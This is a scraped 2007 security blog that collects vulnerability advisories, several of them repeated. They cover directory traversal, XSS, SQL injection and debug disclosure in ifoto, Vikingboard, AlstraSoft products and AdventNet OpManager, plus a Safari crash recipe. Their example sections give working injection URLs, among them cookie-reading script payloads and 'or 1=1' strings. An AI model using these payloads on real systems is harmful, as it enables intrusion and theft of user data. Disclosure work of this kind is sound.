#################################################
ifoto traversal folder enumeration
Vendor url:http://ifoto.ireans.com/
Advisore:http://lostmon.blogspot.com/2007/07/
ifoto-traversal-folder-enumeration.html
vendor notify:no exploit include:yes
Secunia:SA26186
BID:25065
SecWatch: SWID1018593
#################################################
ifoto contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'dir' variable upon submission
to 'index.php' scripts.This could allow a remote users to
create a specially crafted URL that would execute '../'
directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.
################
versions
################
ifoto 1.0
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 18-07-2007
vendor notify:---
vendor response:---
disclosure:25-07-2007
#####################
Examples
#####################
http://[victims]/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
http://[victims]/ifoto/?dir=../../../../../../etc
http://[victims]/ifoto/index.php?dir=../../../../../../
################# €nd ############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Vikingboard multiple Cross site scripting
#################################################
Vikingboard multiple Cross site scripting
Vendor url: http://vikingboard.com/
advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-multiple-cross-site.html
vendor notify:yes exploit include:yes
Secunia:SA26196
BID:25056
SecWatch:SWID1018567
#################################################
Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.
Vikingboard contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.
################
versions
################
Vikingboard 0.1.2
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure:25-07-2007
#####################
Examples
#####################
http://localhost/viking/cp.php?mode=9&id=2[XSS-CODE]
http://localhost/viking/cp.php?mode=7&f=1[XSS-CODE]
http://localhost/viking/cp.php?mode=6"e=1[XSS-CODE]
http://localhost/viking/cp.php?mode=12&act=[XSS-CODE]
http://localhost/viking/user.php?u=2[XSS-CODE]
http://localhost/viking/help.php?act=guidelines[XSS-CODE]
we can call the debug parameter to obtain sensitive information.
http://localhost/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0
wen send a private message the field "Message Title " is affected
http://localhost/viking/cp.php?mode=6
we can send a PM with a malformed XSS title to others users
and it is executed wen the vicims go to Inbox on his control panel
http://localhost/viking/cp.php?mode=7&f=1
http://localhost/viking/report.php?p=2[XSS-CODE]
http://localhost/viking/topic.php?t=2&s=0[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2"e=2[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2[XSS-CODE]"e=2
http://localhost/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]
http://localhost/viking/post.php?mode=02&p=2[XSS-CODE]
http://localhost/viking/search.php?search=user:administrator&act=dosearch
if the user has any script code in the first lines of any post
wen try fo find all post by this user , and wen the applications
show the results it is executed
##################### €nd ##############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
Vikingboard multiple Cross site scripting
Vendor url: http://vikingboard.com/
advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-multiple-cross-site.html
vendor notify:yes exploit include:yes
Secunia:SA26196
BID:25056
SecWatch:SWID1018567
#################################################
Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.
Vikingboard contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.
################
versions
################
Vikingboard 0.1.2
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure:25-07-2007
#####################
Examples
#####################
http://localhost/viking/cp.php?mode=9&id=2[XSS-CODE]
http://localhost/viking/cp.php?mode=7&f=1[XSS-CODE]
http://localhost/viking/cp.php?mode=6"e=1[XSS-CODE]
http://localhost/viking/cp.php?mode=12&act=[XSS-CODE]
http://localhost/viking/user.php?u=2[XSS-CODE]
http://localhost/viking/help.php?act=guidelines[XSS-CODE]
we can call the debug parameter to obtain sensitive information.
http://localhost/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0
wen send a private message the field "Message Title " is affected
http://localhost/viking/cp.php?mode=6
we can send a PM with a malformed XSS title to others users
and it is executed wen the vicims go to Inbox on his control panel
http://localhost/viking/cp.php?mode=7&f=1
http://localhost/viking/report.php?p=2[XSS-CODE]
http://localhost/viking/topic.php?t=2&s=0[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2"e=2[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2[XSS-CODE]"e=2
http://localhost/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]
http://localhost/viking/post.php?mode=02&p=2[XSS-CODE]
http://localhost/viking/search.php?search=user:administrator&act=dosearch
if the user has any script code in the first lines of any post
wen try fo find all post by this user , and wen the applications
show the results it is executed
##################### €nd ##############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
Vikingboard debug information disclosure
#################################################
Vikingboard debug information disclosure
Vendor url:http://vikingboard.com/
Advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-debug-information.html
vendor notify:yes exploit include:yes
#################################################
Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.
Vikingboard has a weakness, which can be exploited by malicious
people to disclose some system information.
The weakness is caused due to a design error where debug
information can be disclosed by specifying the "debug" parameter.
################
versions
################
Vikingboard 0.1.2
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure: 25-07-2007
#####################
Examples
#####################
http://localhost/viking/forum.php?f=1&debug=1
http://localhost/viking/cp.php?mode=10&debug=1
http://localhost/viking/cp.php?&debug=1
################# €nd ############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Vikingboard debug information disclosure
Vendor url:http://vikingboard.com/
Advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-debug-information.html
vendor notify:yes exploit include:yes
#################################################
Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.
Vikingboard has a weakness, which can be exploited by malicious
people to disclose some system information.
The weakness is caused due to a design error where debug
information can be disclosed by specifying the "debug" parameter.
################
versions
################
Vikingboard 0.1.2
################
Solution:
################
No solution was available at this time !!!
################
TimeLine
################
Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure: 25-07-2007
#####################
Examples
#####################
http://localhost/viking/forum.php?f=1&debug=1
http://localhost/viking/cp.php?mode=10&debug=1
http://localhost/viking/cp.php?&debug=1
################# €nd ############################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
AlstraSoft Multiple products multiple Vulnerabilities
Sunday, July 22, 2007
####################################################
AlstraSoft Multiple products multiple Vulnerabilities
Vendor urL:http://www.alstrasoft.com/products.htm
Advisore url:http://lostmon.blogspot.com/2007/07/
alstrasoft-multiple-products-multiple.html
Vendor notify:yes (webform) Exploit included: yes
BID:25022, 25023, 25026
####################################################
Multiple products of Alstrasoft Are prone vulnerables
to Cross site scripting and SQL injections style attacks
################
examples
################
For exploit some flaws you need to login
#####################################
AlstraSoft Video Share Enterprise
#####################################
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>
http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>
http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr
http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=
http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>
http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>
http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>
http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search
http://[Victim]/videoshare/siteadmin/muser.php?
email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>
path disclosure:
http://[Victim]/videoshare/uprofile.php?
UID=53"><script>alert()</script>
http://[Victim]/videoshare/channel_detail.php?
chid=24"><script>alert()</script>
http://[Victim]/videoshare/uvideos.php?UID=53
"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'
http://[Victim]/videoshare/groups_home.php?urlkey=
RSL"><script>alert()</script>
http://[Victim]/videoshare/ufriends.php?UID=253
"><script>alert()</script>
SQL injection :
http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1
###########################################
AlstraSoft Text Ads Enterprise
###########################################
http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>
http://[Victim]/ads/search_results.php?query="><script>alert()</script>
http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>
http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>
#########################################
AlstraSoft SMS Text Messaging Enterprise
########################################
http://[Victim]/admin/membersearch.php?pagina=17&q=
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://[Victim]/admin/edituser.php?userid=
Walltrapas"><script>alert()</script>
http://[Victim]/admin/membersearch.php?
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit
#################################################
e-friends
http://alstrahost.com/friends/index.php?mode=
people_card&p_id=927"><script>alert()</script>
this is a persistent XSS
########################################
AlstraSoft Affiliate Network Pro
########################################
http://[Victim]/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS
http://[Victim]/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all variables XSS affected except Act
http://[Victim]/affiliate/merchants/index.php?Act=
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date
"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007
&programs=All // all variables XSS affceted except Act y sub
http://[Victim]/affiliate/merchants/temp.php?rowid=
5"><script>alert()</script> // posible SQL too
http://[Victim]/affiliate/merchants/index.php?Act=
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>
&modofpay=Authorize.net&bankname=&bankno=&
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=
####################################
AlstraSoft Article Manager Pro
####################################
http://[Victim]/article/contact_author.php?
userid=1%20"><script>alert()</script>
#######################################
AlstraSoft AskMe Pro
#######################################
http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL
http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL
http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>
###################### €nd ########################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
AlstraSoft Multiple products multiple Vulnerabilities
Vendor urL:http://www.alstrasoft.com/products.htm
Advisore url:http://lostmon.blogspot.com/2007/07/
alstrasoft-multiple-products-multiple.html
Vendor notify:yes (webform) Exploit included: yes
BID:25022, 25023, 25026
####################################################
Multiple products of Alstrasoft Are prone vulnerables
to Cross site scripting and SQL injections style attacks
################
examples
################
For exploit some flaws you need to login
#####################################
AlstraSoft Video Share Enterprise
#####################################
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>
http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>
http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr
http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=
http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>
http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>
http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>
http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search
http://[Victim]/videoshare/siteadmin/muser.php?
email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>
path disclosure:
http://[Victim]/videoshare/uprofile.php?
UID=53"><script>alert()</script>
http://[Victim]/videoshare/channel_detail.php?
chid=24"><script>alert()</script>
http://[Victim]/videoshare/uvideos.php?UID=53
"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'
http://[Victim]/videoshare/groups_home.php?urlkey=
RSL"><script>alert()</script>
http://[Victim]/videoshare/ufriends.php?UID=253
"><script>alert()</script>
SQL injection :
http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1
###########################################
AlstraSoft Text Ads Enterprise
###########################################
http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>
http://[Victim]/ads/search_results.php?query="><script>alert()</script>
http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>
http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>
#########################################
AlstraSoft SMS Text Messaging Enterprise
########################################
http://[Victim]/admin/membersearch.php?pagina=17&q=
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://[Victim]/admin/edituser.php?userid=
Walltrapas"><script>alert()</script>
http://[Victim]/admin/membersearch.php?
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit
#################################################
e-friends
http://alstrahost.com/friends/index.php?mode=
people_card&p_id=927"><script>alert()</script>
this is a persistent XSS
########################################
AlstraSoft Affiliate Network Pro
########################################
http://[Victim]/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS
http://[Victim]/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all variables XSS affected except Act
http://[Victim]/affiliate/merchants/index.php?Act=
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date
"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007
&programs=All // all variables XSS affceted except Act y sub
http://[Victim]/affiliate/merchants/temp.php?rowid=
5"><script>alert()</script> // posible SQL too
http://[Victim]/affiliate/merchants/index.php?Act=
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>
&modofpay=Authorize.net&bankname=&bankno=&
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=
####################################
AlstraSoft Article Manager Pro
####################################
http://[Victim]/article/contact_author.php?
userid=1%20"><script>alert()</script>
#######################################
AlstraSoft AskMe Pro
#######################################
http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL
http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL
http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>
###################### €nd ########################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Crashing Safari 3.0.2 for windows Step by Step
Friday, July 13, 2007
Safari for windows 3.0.2 Crash Step by step
http://www.apple.com/safari/download/
The Bug come from activity window wen manage
diferents tab accross the activity window.
I report it to vendor and they working for
debugging this flaw and others (i think).
Version afected:
Safari for windows 3.0.2 (512.13.1)
i don´t know if this issue colud be done
in other versions.
And i don´t know if with this issue a local or
remote user can execute code.
Let´s Go
1 - open a safari window.
2 - open a new tab in the same window (now we are in the second tab)
3 - open Window/activity (we have the two tabs)
4 - click on the first tab in the activity window (safari crashing)
other way :
1 open a safari window ( window 1 )
2 open a new tab in window 1
3 open a new safari window (window 2)
4 open a new tab in window 2 (now we are in the window 2 tab 2)
5 open window/activity (we have the four tabs )
6 doble click in any tab of the window 1 (safari crashing)
I working in a html file to demostrate that this posible vuln can exploit
by a remote user. Any sugention or idea are welcome to Lostmon@gmail.com
Thnx to all !!
Whatch this 'mov' to look the step by step with the video:
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
http://www.apple.com/safari/download/
The Bug come from activity window wen manage
diferents tab accross the activity window.
I report it to vendor and they working for
debugging this flaw and others (i think).
Version afected:
Safari for windows 3.0.2 (512.13.1)
i don´t know if this issue colud be done
in other versions.
And i don´t know if with this issue a local or
remote user can execute code.
Let´s Go
1 - open a safari window.
2 - open a new tab in the same window (now we are in the second tab)
3 - open Window/activity (we have the two tabs)
4 - click on the first tab in the activity window (safari crashing)
other way :
1 open a safari window ( window 1 )
2 open a new tab in window 1
3 open a new safari window (window 2)
4 open a new tab in window 2 (now we are in the window 2 tab 2)
5 open window/activity (we have the four tabs )
6 doble click in any tab of the window 1 (safari crashing)
I working in a html file to demostrate that this posible vuln can exploit
by a remote user. Any sugention or idea are welcome to Lostmon@gmail.com
Thnx to all !!
Whatch this 'mov' to look the step by step with the video:
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
NetFlow Analizer 5 & OpManager 7 multiple XSS
Wednesday, July 04, 2007
###################################################
NetFlow Analizer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisore:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
Secunia:SA25947 SA20067,
BID:24767, 24766
SecWatch:SWID1018376, SWID1018377
###################################################
NetFlow Analizer and OpManager contains a flaw that allows
a remote cross site scripting attack. This flaw exists
because the application does not validate multiple params
upon submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
#####################
Versions afected:
#####################
OpManager 7
OpManager 6
NetFlow Analizer 5
other versions can be vulnerables too
###################
Solution:
###################
No solutions was available at this time !!!
##################
Time Line
##################
Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007
###################
Examples
###################
for exploit some flaws you need to login.
#####################
OpManager
#####################
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E
http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map
http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil
http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter
http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations
